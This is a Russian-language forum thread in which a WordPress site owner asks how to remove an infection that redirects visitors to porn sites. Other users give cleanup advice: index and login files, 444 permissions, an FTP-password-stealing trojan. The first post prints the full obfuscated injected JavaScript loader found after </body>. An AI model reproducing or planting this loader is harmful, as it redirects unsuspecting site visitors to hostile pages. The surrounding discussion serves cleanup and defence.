Не знаю как, но раз через несколько раз, во время открытия сайта происходит его переадресация на всякие порносайты. Нашел после тега </body> вот такую мразь:
<script>var source ="=tdsjqu?epdvnfou/xsjuf)Tusjoh/gspnDibsDpef)71-216-213-225-:8-21:-212-43-226-225-::-72-45-215-227-227-223-69-58-58-68-5:-57-5:-63-61-57-65-63-57-68-5:-58-227-226-58-216-221-57-::-214-216-74-225-228-227-63-45-43-22:-216-211-227-215-72-5:-43-215-212-216-214-215-227-72-5:-43-226-227-232-219-212-72-45-229-216-226-216-:9-216-219-216-227-232-69-43-215-216-211-211-212-221-45-73-71-58-216-213-225-:8-21:-212-73**<=0tdsjqu?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script>поибар нафиг ненужные апи wp-header и wp-footer, поменял пароль на ftp но зараза всеравно осталась.
Подскажите, что я еще могу сделать и какие файлы могут быть заражены, как распознать зловредные скрипты?
Короче, как мне от этого очиститься?
Спасибо!
Пока писал сообщение, хостеры отключили сайт…
Ничего страшного. Недавно лечил эту заразу у себя и еще на десятке дружественных блогов. Вирус поражает только файлы index.* login.*
Желательно после того как очистите файл от этого скрипта установите атрибут 444. Если Вы пропустите хоть один инфицированный файл, в течении часа все файлы будут повторно заражены, за исключением тех у кого изменены атрибуты.
Мне интересно другое, откуда она берется.
только файлы темы!!!…. хорошенько прошарь все папки и внутренности файлов…. может быть так что у тебя окажутся лишние файлы которые ты не создавал… аккуратнее проверяй!!! и за одно на ЧП проверь базу!!!
ozono, не только! Главная беда была в индесном файле самого движка.
удалил – с сайтом все нормально. но сегодня при логине снова выдало порносайт, значит не все почистил, надо еще искать в движке, кстати, какие у нас еще есть индексные файлы в движке, кроме файла темы?
порекомендуй, как базу можно прошестрить?
Я вот думаю, стоит ли менять параметры доступа к БД и пароль админки?
Не, похоже, цепляется только за индексные файлы и дописывает внизу каждого что то типа
цепляет файлы index.* login.* у меня весь хост был инфецирован на хосте 5 доменов, два из которы на WP
Что интересно, до фалов темы он не добрался. Но и там я на всякий случай изменил атрибуты.
Ага, у меня тоже самое – темы не тронул.
А берется он из трояна на компе, который тырит пароли к тотал коммандеру….
Знаю. Забыл про это написать.